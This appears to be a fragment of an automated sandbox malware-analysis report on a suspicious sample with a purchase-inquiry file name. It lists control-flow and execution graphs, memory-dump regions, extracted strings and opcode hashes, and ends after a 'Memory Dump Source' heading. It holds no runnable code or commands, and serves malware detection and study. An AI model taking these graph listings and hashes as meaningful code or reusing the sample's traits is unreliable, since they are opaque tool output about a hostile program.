                                                                    • Associated: 00000000.00000002.106938943446.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: lstrlen$CharNextlstrcmpi
                                                                    • String ID:
                                                                    • API String ID: 190613189-0
                                                                    • Opcode ID: 922b063ced0d048d400f1e9b804922caee6ea3aadebd60a230e58aa4fefa9f78
                                                                    • Instruction ID: 09ddfbf6a96cc3af2c4d2f748c9cef087a74b3384d996a5f3154f8737d8de66f
                                                                    • Opcode Fuzzy Hash: 922b063ced0d048d400f1e9b804922caee6ea3aadebd60a230e58aa4fefa9f78
                                                                    • Instruction Fuzzy Hash: 86F0C231904514EFC7129FA5CC00D9FBBB8EF06350B2540A5E800F7351D634FE019BA9

                                                                    Execution Graph

                                                                    Execution Coverage:11.9%
                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                    Signature Coverage:0%
                                                                    Total number of Nodes:36
                                                                    Total number of Limit Nodes:1
                                                                    execution_graph 30092 111390 30094 111396 30092->30094 30093 1114b9 30094->30093 30100 116a20 30094->30100 30105 116a11 30094->30105 30110 116b4c 30094->30110 30115 116b8a 30094->30115 30120 116be9 30094->30120 30102 116a39 30100->30102 30101 116c7b 30101->30094 30102->30101 30125 116c98 30102->30125 30129 116c88 30102->30129 30107 116a39 30105->30107 30106 116c7b 30106->30094 30107->30106 30108 116c98 DeleteFileW 30107->30108 30109 116c88 DeleteFileW 30107->30109 30108->30106 30109->30106 30112 116b51 30110->30112 30111 116c7b 30111->30094 30113 116c98 DeleteFileW 30112->30113 30114 116c88 DeleteFileW 30112->30114 30113->30111 30114->30111 30117 116b8f 30115->30117 30116 116c7b 30116->30094 30118 116c98 DeleteFileW 30117->30118 30119 116c88 DeleteFileW 30117->30119 30118->30116 30119->30116 30122 116bee 30120->30122 30121 116c7b 30121->30094 30123 116c98 DeleteFileW 30122->30123 30124 116c88 DeleteFileW 30122->30124 30123->30121 30124->30121 30126 116ca8 30125->30126 30127 116cda 30126->30127 30133 115bec 30126->30133 30127->30101 30131 116c98 30129->30131 30130 116cda 30130->30101 30131->30130 30132 115bec DeleteFileW 30131->30132 30132->30130 30134 116cf8 DeleteFileW 30133->30134 30136 116d77 30134->30136 30136->30127

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 0 3a7c2bf8-3a7c2c19 1 3a7c2c1b-3a7c2c1e 0->1 2 3a7c2c44-3a7c2c47 1->2 3 3a7c2c20-3a7c2c3f 1->3 4 3a7c2c4d-3a7c2c6c 2->4 5 3a7c33e8-3a7c33ea 2->5 3->2 13 3a7c2c6e-3a7c2c71 4->13 14 3a7c2c85-3a7c2c8f 4->14 7 3a7c33ec 5->7 8 3a7c33f1-3a7c33f4 5->8 7->8 8->1 9 3a7c33fa-3a7c3403 8->9 13->14 15 3a7c2c73-3a7c2c83 13->15 18 3a7c2c95-3a7c2ca6 call 3a7c1b3c 14->18 15->18 20 3a7c2cab-3a7c2cb0 18->20 21 3a7c2cbd-3a7c2f9a 20->21 22 3a7c2cb2-3a7c2cb8 20->22 43 3a7c33da-3a7c33e7 21->43 44 3a7c2fa0-3a7c304f 21->44 22->9 53 3a7c3078 44->53 54 3a7c3051-3a7c3076 44->54 56 3a7c3081-3a7c3094 call 3a7c1b48 53->56 54->56 59 3a7c309a-3a7c30bc call 3a7c1b54 56->59 60 3a7c33c1-3a7c33cd 56->60 59->60 64 3a7c30c2-3a7c30cc 59->64 60->44 61 3a7c33d3 60->61 61->43 64->60 65 3a7c30d2-3a7c30dd 64->65 65->60 66 3a7c30e3-3a7c31b9 65->66 78 3a7c31bb-3a7c31bd 66->78 79 3a7c31c7-3a7c31f7 66->79 78->79 83 3a7c31f9-3a7c31fb 79->83 84 3a7c3205-3a7c3211 79->84 83->84 85 3a7c3271-3a7c3275 84->85 86 3a7c3213-3a7c3217 84->86 87 3a7c327b-3a7c32b7 85->87 88 3a7c33b2-3a7c33bb 85->88 86->85 89 3a7c3219-3a7c3243 86->89 101 3a7c32b9-3a7c32bb 87->101 102 3a7c32c5-3a7c32d3 87->102 88->60 88->66 96 3a7c3245-3a7c3247 89->96 97 3a7c3251-3a7c326e call 3a7c1b60 89->97 96->97 97->85 101->102 104 3a7c32ea-3a7c32f5 102->104 105 3a7c32d5-3a7c32e0 102->105 109 3a7c330d-3a7c331e 104->109 110 3a7c32f7-3a7c32fd 104->110 105->104 108 3a7c32e2 105->108 108->104 114 3a7c3336-3a7c3342 109->114 115 3a7c3320-3a7c3326 109->115 111 3a7c32ff 110->111 112 3a7c3301-3a7c3303 110->112 111->109 112->109 119 3a7c335a-3a7c33ab 114->119 120 3a7c3344-3a7c334a 114->120 116 3a7c3328 115->116 117 3a7c332a-3a7c332c 115->117 116->114 117->114 119->88 121 3a7c334c 120->121 122 3a7c334e-3a7c3350 120->122 121->119 122->119
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.111732797126.000000003A7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A7C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_3a7c0000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: (gt:$$sq$$sq$$sq$$sq$$sq$$sq$gt:
                                                                    • API String ID: 0-1744893111
                                                                    • Opcode ID: 1bf4319bc6a6b5346ea24e0cc00d74e99d6b13b6207ede053042056f8f6494b4
                                                                    • Instruction ID: c4e8ae15a3e9c1cf51d9dd840339de1c435f8a342ca6b818540da2e97e3d5e9a
                                                                    • Opcode Fuzzy Hash: 1bf4319bc6a6b5346ea24e0cc00d74e99d6b13b6207ede053042056f8f6494b4
                                                                    • Instruction Fuzzy Hash: 81323C30E1075ACBDB15DFA5C89059DF7B6BFD9300F61C6A9D409AB211EF30AA85CB80
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.111732797126.000000003A7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A7C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_3a7c0000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 8 t:$8 t:
                                                                    • API String ID: 0-2208087787
                                                                    • Opcode ID: 1c296db3cf4043469d765fa512a42899692be230c21acb431344285270851b32
                                                                    • Instruction ID: 192e2f12e340316281674c369e9a2ec693556965d0adb1cee36995223ac1b3c9
                                                                    • Opcode Fuzzy Hash: 1c296db3cf4043469d765fa512a42899692be230c21acb431344285270851b32
                                                                    • Instruction Fuzzy Hash: 43627E34A002059FEB14DB64C5D4A9DBBF3EF88390F648569E405AF395EB36ED46CB80
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.111732797126.000000003A7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A7C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_3a7c0000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 89${JD
                                                                    • API String ID: 0-1055443195
                                                                    • Opcode ID: 1dbd7fb660ed60a0e2842628343e2605544ea57400039a46755378d347a0263c
                                                                    • Instruction ID: f86a59f13b57e743683582a965ce6af57e4046cda76cddcac594eb408ea0058f
                                                                    • Opcode Fuzzy Hash: 1dbd7fb660ed60a0e2842628343e2605544ea57400039a46755378d347a0263c
                                                                    • Instruction Fuzzy Hash: 61329334B402058FEB55DFA8C8D4A9DBBB2FB88350F248529E505EB351EB35ED46CB90
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.111732797126.000000003A7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A7C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_3a7c0000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $$ez:
                                                                    • API String ID: 0-588397267
                                                                    • Opcode ID: 938d8717ee58a341e8262bb1feff4f787c819beb0c3e2a5d5dc8b65ebff4c546
                                                                    • Instruction ID: 675aa362d36b4a2a4f185368caef08c7a97140312b3b8504c81ca8b6cc9f6f7f
                                                                    • Opcode Fuzzy Hash: 938d8717ee58a341e8262bb1feff4f787c819beb0c3e2a5d5dc8b65ebff4c546
                                                                    • Instruction Fuzzy Hash: 8F22C275E002059FEB14DBA4C8D469EBBB2FF88350F258469D406EF351EA36DD4ACB90

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 2468 3a8908d0-3a8908e2 2469 3a8908e4-3a89090f 2468->2469 2470 3a890946-3a89094d 2468->2470 2476 3a890916-3a890923 2469->2476 2478 3a89094e-3a8909a6 2476->2478 2479 3a890925-3a89093e 2476->2479 2489 3a8909a8-3a8909b5 2478->2489 2490 3a8909e2-3a8909e5 2478->2490 2479->2470 2491 3a8909be-3a8909ce 2489->2491 2492 3a8909b7-3a8909b9 2489->2492 2493 3a8909eb-3a8909f9 2490->2493 2494 3a890c44-3a890c52 2490->2494 2496 3a8909d0 2491->2496 2497 3a8909d5-3a8909e1 2491->2497 2495 3a890c5d-3a890c64 2492->2495 2500 3a890c65-3a890cde 2493->2500 2503 3a8909ff 2493->2503 2494->2500 2501 3a890c54-3a890c56 2494->2501 2496->2495 2497->2490 2501->2495 2503->2500 2504 3a890bc9-3a890bf5 2503->2504 2505 3a890a6a-3a890a8b 2503->2505 2506 3a890b2f-3a890b57 2503->2506 2507 3a890a43-3a890a65 2503->2507 2508 3a890b02-3a890b2a 2503->2508 2509 3a890a06-3a890a18 2503->2509 2510 3a890c38-3a890c42 2503->2510 2511 3a890a1d-3a890a3e 2503->2511 2512 3a890adc-3a890afd 2503->2512 2513 3a890b5c-3a890b99 2503->2513 2514 3a890b9e-3a890bc4 2503->2514 2515 3a890a90-3a890ab1 2503->2515 2516 3a890c14-3a890c36 2503->2516 2517 3a890bf7-3a890c12 2503->2517 2518 3a890ab6-3a890ad7 2503->2518 2504->2495 2505->2495 2506->2495 2507->2495 2508->2495 2509->2495 2510->2495 2511->2495 2512->2495 2513->2495 2514->2495 2515->2495 2516->2495 2517->2495 2518->2495
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.111732940947.000000003A890000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A890000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_3a890000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Xwq$$sq
                                                                    • API String ID: 0-2558833440
                                                                    • Opcode ID: 674490fd3f5125c5b4e6e518efce5e225b67efa86cd461e82aaa128ea8e3df95
                                                                    • Instruction ID: d3ed7ec20c6ae7358295220fb59e7308da6391c0a0dd04805a8733ce862144ec
                                                                    • Opcode Fuzzy Hash: 674490fd3f5125c5b4e6e518efce5e225b67efa86cd461e82aaa128ea8e3df95
                                                                    • Instruction Fuzzy Hash: 06B1C534B083189FDB1C9B7988552AEBBB7BFC9710B15852ED446EB385DE38CC068791
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.111732797126.000000003A7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A7C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_3a7c0000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 55c216f6818bc24aa12baace3a4961314ce9e0c92a44a1cc0338052e61ef75e7
                                                                    • Instruction ID: 9e2621fdc896bb19ea800cde26bbe4c2d414bdeecef997d0b53a77c8aae7c017
                                                                    • Opcode Fuzzy Hash: 55c216f6818bc24aa12baace3a4961314ce9e0c92a44a1cc0338052e61ef75e7
                                                                    • Instruction Fuzzy Hash: 3922A278B001098FEB54CBA8C5D079EBBB3FB49351F648526E405EF391EA38DD858B91

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 984 3a7c0780-3a7c0782 985 3a7c07be 984->985 986 3a7c0784-3a7c078a 984->986 989 3a7c07bf-3a7c07c2 985->989 987 3a7c078c-3a7c07bd 986->987 988 3a7c07c6 986->988 987->985 992 3a7c07c7-3a7c07cf 988->992 993 3a7c0871-3a7c0884 988->993 990 3a7c07c4-3a7c07c5 989->990 991 3a7c07d1-3a7c07d4 989->991 990->988 994 3a7c07da-3a7c07dd 991->994 995 3a7c09cb-3a7c0a03 991->995 992->991 1001 3a7c0889-3a7c088c 993->1001 996 3a7c07df-3a7c07ef 994->996 997 3a7c0800-3a7c0803 994->997 1014 3a7c0a0a-3a7c0a42 995->1014 1003 3a7c07f8-3a7c07fb 996->1003 999 3a7c080d-3a7c0810 997->999 1000 3a7c0805-3a7c080a 997->1000 1006 3a7c0838-3a7c083b 999->1006 1007 3a7c0812-3a7c0818 999->1007 1000->999 1004 3a7c0a49-3a7c0a98 1001->1004 1005 3a7c0892-3a7c0895 1001->1005 1003->997 1054 3a7c0a9a 1004->1054 1055 3a7c0ac3-3a7c0aca 1004->1055 1008 3a7c08a4-3a7c08a7 1005->1008 1009 3a7c0897-3a7c0899 1005->1009 1011 3a7c083d-3a7c084f 1006->1011 1012 3a7c0863-3a7c0866 1006->1012 1017 3a7c0821-3a7c0833 1007->1017 1018 3a7c08a9-3a7c08af 1008->1018 1019 3a7c08b6-3a7c08b9 1008->1019 1015 3a7c089f 1009->1015 1016 3a7c0926-3a7c092e 1009->1016 1104 3a7c0855 call 3a7c0aa0 1011->1104 1105 3a7c0855 call 3a7c0780 1011->1105 1013 3a7c086c-3a7c086f 1012->1013 1012->1014 1013->993 1013->1001 1014->1004 1015->1008 1034 3a7c0933-3a7c0936 1016->1034 1017->1006 1018->1009 1021 3a7c08b1 1018->1021 1022 3a7c08fb-3a7c08fe 1019->1022 1023 3a7c08bb-3a7c08f6 1019->1023 1021->1019 1026 3a7c090f-3a7c0912 1022->1026 1027 3a7c0900-3a7c090a 1022->1027 1023->1022 1025 3a7c085b-3a7c085e 1025->1012 1032 3a7c0914-3a7c091c 1026->1032 1033 3a7c0921-3a7c0924 1026->1033 1027->1026 1032->1033 1033->1016 1033->1034 1040 3a7c096f-3a7c0972 1034->1040 1041 3a7c0938-3a7c096a 1034->1041 1042 3a7c09a9-3a7c09ab 1040->1042 1043 3a7c0974-3a7c09a4 1040->1043 1041->1040 1046 3a7c09ad 1042->1046 1047 3a7c09b2-3a7c09b5 1042->1047 1043->1042 1046->1047 1047->989 1051 3a7c09bb-3a7c09c8 1047->1051 1056 3a7c0a9c-3a7c0ab8 1054->1056 1057 3a7c0ad6 1054->1057 1058 3a7c0ad0-3a7c0ad2 1055->1058 1059 3a7c0aba-3a7c0abd 1056->1059 1060 3a7c0ad7-3a7c0ada 1057->1060 1058->1060 1059->1060 1061 3a7c0abf-3a7c0aca 1059->1061 1062 3a7c0b6d-3a7c0ba5 1060->1062 1063 3a7c0ae0-3a7c0ae3 1060->1063 1061->1058 1064 3a7c0bac-3a7c0bfe 1062->1064 1063->1064 1065 3a7c0ae9-3a7c0aec 1063->1065 1093 3a7c0c3a-3a7c0c55 1064->1093 1094 3a7c0c00-3a7c0c35 1064->1094 1066 3a7c0aee-3a7c0af3 1065->1066 1067 3a7c0af6-3a7c0af9 1065->1067 1066->1067 1070 3a7c0afb-3a7c0afd 1067->1070 1071 3a7c0b04-3a7c0b07 1067->1071 1070->1061 1073 3a7c0aff 1070->1073 1074 3a7c0b09-3a7c0b1f 1071->1074 1075 3a7c0b24-3a7c0b27 1071->1075 1073->1071 1074->1075 1078 3a7c0b29-3a7c0b2b 1075->1078 1079 3a7c0b32-3a7c0b35 1075->1079 1082 3a7c0b2d 1078->1082 1083 3a7c0b60-3a7c0b6a 1078->1083 1084 3a7c0b4e-3a7c0b50 1079->1084 1085 3a7c0b37-3a7c0b3f 1079->1085 1082->1079 1086 3a7c0b57-3a7c0b5a 1084->1086 1087 3a7c0b52 1084->1087 1106 3a7c0b42 call 3a7c0aa0 1085->1106 1107 3a7c0b42 call 3a7c0780 1085->1107 1086->1059 1086->1083 1087->1086 1090 3a7c0b47-3a7c0b49 1090->1084 1096 3a7c0c5d-3a7c0c63 1093->1096 1097 3a7c0c57-3a7c0c5a 1093->1097 1094->1093 1098 3a7c0c65-3a7c0c6e 1096->1098 1099 3a7c0c71-3a7c0c90 1096->1099 1097->1096 1098->1099 1100 3a7c0c96-3a7c0ca1 1099->1100 1101 3a7c0caa-3a7c0cbe 1100->1101 1102 3a7c0ca3-3a7c0ca9 1100->1102 1102->1101 1104->1025 1105->1025 1106->1090 1107->1090
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.111732797126.000000003A7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A7C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_3a7c0000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: D@$D@$D@
                                                                    • API String ID: 0-3330130650
                                                                    • Opcode ID: a94b2dbce91ea4b313f6132bc9e74a0bf82a6009029cc49a8d8336e3ab7c480b
                                                                    • Instruction ID: 7e36841fe0a426c40ad755108365536660811ec03351b3512532ffe1415c71e7
                                                                    • Opcode Fuzzy Hash: a94b2dbce91ea4b313f6132bc9e74a0bf82a6009029cc49a8d8336e3ab7c480b
                                                                    • Instruction Fuzzy Hash: E8B1B034B002198FEB11CBA4C8D0B9EBBB2EF45310F15856AE945EF291D734DD4ACB92

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1108 3a7c0040-3a7c005f 1109 3a7c021a-3a7c023f 1108->1109 1110 3a7c0065-3a7c006e 1108->1110 1116 3a7c0246-3a7c0282 1109->1116 1115 3a7c0074-3a7c00c9 1110->1115 1110->1116 1125 3a7c00cb-3a7c00f0 1115->1125 1126 3a7c00f3-3a7c00fc 1115->1126 1133 3a7c02be 1116->1133 1134 3a7c0284-3a7c02bb 1116->1134 1125->1126 1128 3a7c00fe 1126->1128 1129 3a7c0101-3a7c0111 1126->1129 1128->1129 1165 3a7c0113 call 3a7c001f 1129->1165 1166 3a7c0113 call 3a7c0040 1129->1166 1167 3a7c0113 call 3a7c0221 1129->1167 1132 3a7c0119-3a7c011b 1137 3a7c011d-3a7c0122 1132->1137 1138 3a7c0175-3a7c01c2 1132->1138 1135 3a7c02c6-3a7c02de 1133->1135 1134->1135 1168 3a7c02e0 call 3a7c04c8 1135->1168 1169 3a7c02e0 call 3a7c04d0 1135->1169 1170 3a7c02e0 call 3a7c0482 1135->1170 1139 3a7c015b-3a7c016e 1137->1139 1140 3a7c0124-3a7c0159 1137->1140 1152 3a7c01c9-3a7c01ce 1138->1152 1139->1138 1140->1152 1147 3a7c02e5-3a7c02ea 1153 3a7c01d8-3a7c01dd 1152->1153 1154 3a7c01d0 1152->1154 1155 3a7c01df 1153->1155 1156 3a7c01e7-3a7c01ec 1153->1156 1154->1153 1155->1156 1158 3a7c01ee-3a7c01f9 1156->1158 1159 3a7c0201 1156->1159 1158->1159 1159->1109 1165->1132 1166->1132 1167->1132 1168->1147 1169->1147 1170->1147
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.111732797126.000000003A7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A7C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_3a7c0000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: (&sq$(wq$Pt:
                                                                    • API String ID: 0-3924421274
                                                                    • Opcode ID: 20b1d4409c96ebd1a96bf2b4d6fc26681277b56119fed805cab025426bd5e8e5
                                                                    • Instruction ID: 605e9ae9a2c0ca68004a61f5d797fe4fd1299159eda66030861652518d7875d5
                                                                    • Opcode Fuzzy Hash: 20b1d4409c96ebd1a96bf2b4d6fc26681277b56119fed805cab025426bd5e8e5
                                                                    • Instruction Fuzzy Hash: A2719671F042195BDF09DBB9C8906EEBBB2AF89700F15412AE405BB381EE349D46CBD5

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1171 3a7c4300-3a7c4324 1172 3a7c4326-3a7c4329 1171->1172 1173 3a7c434a-3a7c434d 1172->1173 1174 3a7c432b-3a7c432e 1172->1174 1176 3a7c4a2c-3a7c4a2e 1173->1176 1177 3a7c4353-3a7c43a0 1173->1177 1180 3a7c4330-3a7c4345 1174->1180 1181 3a7c43a1-3a7c444b 1174->1181 1178 3a7c4a35-3a7c4a38 1176->1178 1179 3a7c4a30 1176->1179 1177->1181 1178->1172 1182 3a7c4a3e-3a7c4a4b 1178->1182 1179->1178 1180->1173 1198 3a7c44ce-3a7c44d5 1181->1198 1199 3a7c4451-3a7c449e call 3a7c4ba8 1181->1199 1200 3a7c4559-3a7c4562 1198->1200 1201 3a7c44db-3a7c454b 1198->1201 1212 3a7c44a4-3a7c44c0 1199->1212 1200->1182 1218 3a7c454d 1201->1218 1219 3a7c4556 1201->1219 1215 3a7c44cb-3a7c44cc 1212->1215 1216 3a7c44c2 1212->1216 1215->1198 1216->1215 1218->1219 1219->1200
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.111732797126.000000003A7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A7C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_3a7c0000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: fxq$XPxq$\Oxq
                                                                    • API String ID: 0-1685638392
                                                                    • Opcode ID: f801a1b5c6a0d4f0875acd92d55912ef0f0195ec43373ed9a67dabf1d0e44f0f
                                                                    • Instruction ID: eb9d5a4e5d8e1cfe456135fb56e432044f9327f668c00125fd2dd0a5cd1cfd74
                                                                    • Opcode Fuzzy Hash: f801a1b5c6a0d4f0875acd92d55912ef0f0195ec43373ed9a67dabf1d0e44f0f
                                                                    • Instruction Fuzzy Hash: AF616270B002199FEB549BA5C8557AEBBF6FF88300F20812AE10AEB395DF744D459F90

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 2330 3a890ef8-3a890f1a 2331 3a890f1c-3a890f1f 2330->2331 2332 3a890f21-3a890f2e 2331->2332 2333 3a890f42-3a890f45 2331->2333 2347 3a890f30-3a890f3d 2332->2347 2348 3a890ed4 2332->2348 2334 3a890f5c-3a890f5f 2333->2334 2335 3a890f47-3a890f51 2333->2335 2337 3a890f61-3a890f8d 2334->2337 2338 3a890f92-3a890f95 2334->2338 2349 3a890ff1-3a891012 2335->2349 2350 3a890f57 2335->2350 2337->2338 2339 3a890fb5-3a890fb8 2338->2339 2340 3a890f97-3a890faa 2338->2340 2345 3a890fba-3a890fcf 2339->2345 2346 3a890fd4-3a890fd7 2339->2346 2343 3a891109-3a891110 2340->2343 2344 3a890fb0 2340->2344 2351 3a891115-3a891118 2343->2351 2344->2339 2345->2346 2352 3a891168-3a89116a 2346->2352 2353 3a890fdd-3a890fe0 2346->2353 2347->2333 2354 3a890eae-3a890ed3 2348->2354 2355 3a890ed6-3a890ee5 2348->2355 2369 3a891017-3a89101a 2349->2369 2350->2334 2361 3a891138-3a89113b 2351->2361 2362 3a89111a-3a891133 2351->2362 2358 3a89132f-3a89136a 2352->2358 2359 3a891170 2352->2359 2363 3a890fec-3a890fef 2353->2363 2364 3a890fe2-3a890fe9 2353->2364 2354->2348 2409 3a89137c 2358->2409 2410 3a89136c-3a89137a 2358->2410 2367 3a891175-3a891178 2359->2367 2365 3a89113d-3a89115e 2361->2365 2366 3a891163-3a891166 2361->2366 2362->2361 2363->2349 2363->2369 2365->2366 2366->2352 2366->2367 2374 3a89117a-3a89118b 2367->2374 2375 3a891190-3a891193 2367->2375 2371 3a89101c-3a89102c 2369->2371 2372 3a891031-3a891034 2369->2372 2371->2372 2380 3a891051-3a891054 2372->2380 2381 3a891036-3a89104c 2372->2381 2374->2375 2382 3a8911b0-3a8911b3 2375->2382 2383 3a891195-3a8911ab 2375->2383 2391 3a891069-3a89106c 2380->2391 2392 3a891056-3a891064 2380->2392 2381->2380 2384 3a891202-3a891205 2382->2384 2385 3a8911b5-3a8911fd 2382->2385 2383->2382 2397 3a891229-3a89122c 2384->2397 2398 3a891207-3a891224 2384->2398 2385->2384 2393 3a8910c8-3a8910cb 2391->2393 2394 3a89106e-3a8910c3 2391->2394 2392->2391 2405 3a8910cd-3a8910de 2393->2405 2406 3a8910e3-3a8910e6 2393->2406 2394->2393 2403 3a89123a-3a89123c 2397->2403 2404 3a89122e-3a891235 2397->2404 2398->2397 2414 3a89123e 2403->2414 2415 3a891243-3a891246 2403->2415 2404->2403 2405->2406 2411 3a8910e8-3a8910ec 2406->2411 2412 3a8910f7-3a8910fa 2406->2412 2425 3a891384-3a891399 2409->2425 2410->2425 2411->2358 2418 3a8910f2 2411->2418 2419 3a8910fc-3a891101 2412->2419 2420 3a891104-3a891107 2412->2420 2414->2415 2415->2331 2422 3a89124c-3a89125b 2415->2422 2418->2412 2419->2420 2420->2343 2420->2351 2431 3a891261-3a891276 2422->2431 2432 3a891317-3a89132c 2422->2432 2438 3a8913ab 2425->2438 2439 3a89139b-3a8913a9 2425->2439 2441 3a89127d-3a891311 2431->2441 2432->2358 2443 3a8913b3-3a8913f3 2438->2443 2439->2443 2441->2431 2441->2432 2454 3a8913fb-3a89142e 2443->2454 2462 3a89143b 2454->2462 2463 3a891430-3a891435 2454->2463 2466 3a89143c 2462->2466 2463->2462 2466->2466
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.111732940947.000000003A890000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A890000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_3a890000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Tesq$Tesq
                                                                    • API String ID: 0-1365298620
                                                                    • Opcode ID: eff2d739b561b1247570a96c848d4ff90bddab2bc8cff5319d8f6e23b8ca6515
                                                                    • Instruction ID: fd8c26d13506e5ca7cd21d67c366532bfe5b394d5bf9c0565483d6aeda499b5d
                                                                    • Opcode Fuzzy Hash: eff2d739b561b1247570a96c848d4ff90bddab2bc8cff5319d8f6e23b8ca6515
                                                                    • Instruction Fuzzy Hash: E0E19D74A043058FEB55DBA9C49069DBBB2FF89300F24852DE406EB391DB75ED46CB90

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 3648 3a7c0aa0-3a7c0ab8 3649 3a7c0aba-3a7c0abd 3648->3649 3650 3a7c0abf-3a7c0ad2 3649->3650 3651 3a7c0ad7-3a7c0ada 3649->3651 3650->3651 3652 3a7c0b6d-3a7c0ba5 3651->3652 3653 3a7c0ae0-3a7c0ae3 3651->3653 3655 3a7c0bac-3a7c0bfe 3652->3655 3653->3655 3656 3a7c0ae9-3a7c0aec 3653->3656 3684 3a7c0c3a-3a7c0c55 3655->3684 3685 3a7c0c00-3a7c0c35 3655->3685 3657 3a7c0aee-3a7c0af3 3656->3657 3658 3a7c0af6-3a7c0af9 3656->3658 3657->3658 3660 3a7c0afb-3a7c0afd 3658->3660 3661 3a7c0b04-3a7c0b07 3658->3661 3660->3650 3664 3a7c0aff 3660->3664 3665 3a7c0b09-3a7c0b1f 3661->3665 3666 3a7c0b24-3a7c0b27 3661->3666 3664->3661 3665->3666 3669 3a7c0b29-3a7c0b2b 3666->3669 3670 3a7c0b32-3a7c0b35 3666->3670 3673 3a7c0b2d 3669->3673 3674 3a7c0b60-3a7c0b6a 3669->3674 3675 3a7c0b4e-3a7c0b50 3670->3675 3676 3a7c0b37-3a7c0b3f 3670->3676 3673->3670 3677 3a7c0b57-3a7c0b5a 3675->3677 3678 3a7c0b52 3675->3678 3695 3a7c0b42 call 3a7c0aa0 3676->3695 3696 3a7c0b42 call 3a7c0780 3676->3696 3677->3649 3677->3674 3678->3677 3681 3a7c0b47-3a7c0b49 3681->3675 3687 3a7c0c5d-3a7c0c63 3684->3687 3688 3a7c0c57-3a7c0c5a 3684->3688 3685->3684 3689 3a7c0c65-3a7c0c6e 3687->3689 3690 3a7c0c71-3a7c0c90 3687->3690 3688->3687 3689->3690 3691 3a7c0c96-3a7c0ca1 3690->3691 3692 3a7c0caa-3a7c0cbe 3691->3692 3693 3a7c0ca3-3a7c0ca9 3691->3693 3693->3692 3695->3681 3696->3681
                                                                    Strings
                                                                    Memory Dump Source
